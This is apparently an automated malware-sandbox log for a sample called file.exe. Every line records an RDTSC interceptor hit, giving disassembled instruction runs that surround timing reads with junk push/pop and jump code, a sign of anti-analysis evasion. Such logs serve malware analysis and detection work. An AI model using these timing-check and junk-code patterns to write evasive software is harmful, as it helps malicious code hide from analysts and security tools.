Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10022A4 second address: 10022AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1001AAD second address: 1001ABC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F7797Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1001FFD second address: 1002008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10056E9 second address: 10056ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10056ED second address: 10056F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1005BC5 second address: 1005BD0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1005BD0 second address: 1005BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1F50CBBC3Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100602C second address: 100604C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1F50F77983h 0x0000000b jng 00007F1F50F77976h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100CB61 second address: 100CB67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100CB67 second address: 100CB6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100D6AE second address: 100D6DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1F50CBBC3Bh 0x00000008 jmp 00007F1F50CBBC41h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1F50CBBC3Ah 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100D6DE second address: 100D6E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100D97E second address: 100D982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100DEC7 second address: 100DED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F1F50F77976h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100DED1 second address: 100DEDB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1F50CBBC36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100E1F0 second address: 100E1F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100E1F4 second address: 100E1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100E1FC second address: 100E203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100E203 second address: 100E230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F50CBBC46h 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d js 00007F1F50CBBC36h 0x00000013 pop edx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100E49A second address: 100E4B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F50F77985h 0x00000009 js 00007F1F50F77976h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1012913 second address: 1012919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1012919 second address: 101291D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101291D second address: 1012968 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1F50CBBC3Eh 0x0000000b jnl 00007F1F50CBBC4Fh 0x00000011 pushad 0x00000012 jmp 00007F1F50CBBC43h 0x00000017 push edx 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1011AD8 second address: 1011AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1011C2E second address: 1011C49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC47h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1012015 second address: 101201B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101201B second address: 101201F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101723D second address: 1017241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1017241 second address: 1017255 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1F50CBBC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F1F50CBBC7Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1017255 second address: 1017259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1017259 second address: 101725D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101F011 second address: 101F017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101D20B second address: 101D211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101D211 second address: 101D229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007F1F50F7797Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101D229 second address: 101D22F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101D38E second address: 101D399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F1F50F77976h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101D399 second address: 101D39E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101D7EC second address: 101D809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F50F77987h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101D95E second address: 101D962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101D962 second address: 101D97E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F50F77986h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101D97E second address: 101D998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F50CBBC44h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101DD9C second address: 101DDA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1027A47 second address: 1027A4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1027BBC second address: 1027BC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102A1FB second address: 102A21C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 ja 00007F1F50CBBC36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007F1F50CBBC3Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102A21C second address: 102A222 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1036578 second address: 103657E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103657E second address: 1036584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103A0B4 second address: 103A0B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103FA59 second address: 103FA93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F50F77980h 0x00000009 jmp 00007F1F50F77989h 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 jc 00007F1F50F7797Eh 0x00000017 push edx 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103FA93 second address: 103FAAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1F50CBBC38h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1F50CBBC3Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103FAAC second address: 103FABA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1F50F77976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1048C50 second address: 1048C5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1048C5A second address: 1048C5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104B1D6 second address: 104B1EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F1F50CBBC36h 0x0000000c popad 0x0000000d jo 00007F1F50CBBC42h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104B1EB second address: 104B1F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105273E second address: 1052750 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Dh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1051089 second address: 1051095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1F50F77976h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1051497 second address: 10514B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F50CBBC49h 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10514B5 second address: 10514C1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10514C1 second address: 10514C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1051767 second address: 105176D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10518B6 second address: 10518D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F1F50CBBC46h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10518D4 second address: 10518DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10518DD second address: 10518F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F50CBBC47h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10518F8 second address: 1051910 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1F50F77976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F1F50F77976h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1051910 second address: 105191C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 je 00007F1F50CBBC36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1052455 second address: 105246E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F1F50F77976h 0x0000000c popad 0x0000000d jmp 00007F1F50F7797Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1067675 second address: 1067688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F1F50CBBC36h 0x0000000a popad 0x0000000b push edi 0x0000000c jng 00007F1F50CBBC36h 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1067688 second address: 106769F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007F1F50F77976h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jp 00007F1F50F77976h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106769F second address: 10676A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1069E5A second address: 1069E64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1069E64 second address: 1069E69 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1069CAA second address: 1069CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F50F7797Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1069CBB second address: 1069CBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1069CBF second address: 1069CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1F50F77989h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jnp 00007F1F50F77991h 0x00000013 push edi 0x00000014 jo 00007F1F50F77976h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106440F second address: 1064415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1079DC1 second address: 1079DC7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1079DC7 second address: 1079DDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1079DDD second address: 1079DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1079DE3 second address: 1079E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1F50CBBC48h 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1092DBE second address: 1092DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push esi 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1092DCA second address: 1092DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1F50CBBC49h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1092141 second address: 1092145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1092145 second address: 1092149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1092149 second address: 1092151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1092151 second address: 1092171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F50CBBC46h 0x00000009 jg 00007F1F50CBBC36h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1092171 second address: 109217F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F1F50F77976h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1092733 second address: 1092739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1092739 second address: 109273D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109273D second address: 1092741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1097451 second address: 1097455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1097455 second address: 109745B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109745B second address: 109748C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007F1F50F77976h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+1247C696h], edi 0x00000015 push dword ptr [ebp+122D1B62h] 0x0000001b mov dx, A108h 0x0000001f call 00007F1F50F77979h 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 jp 00007F1F50F77976h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109748C second address: 10974A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1F50CBBC43h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10974A7 second address: 10974C3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1F50F77976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1F50F7797Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10974C3 second address: 10974C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10974C7 second address: 109750E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1F50F7797Bh 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push ecx 0x00000012 jmp 00007F1F50F7797Ch 0x00000017 pop ecx 0x00000018 jmp 00007F1F50F77981h 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 js 00007F1F50F77982h 0x00000026 je 00007F1F50F7797Ch 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1098ED8 second address: 1098EF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007F1F50CBBC36h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1098EF4 second address: 1098F05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F50F7797Bh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1098F05 second address: 1098F09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109AAB6 second address: 109AAD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77989h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
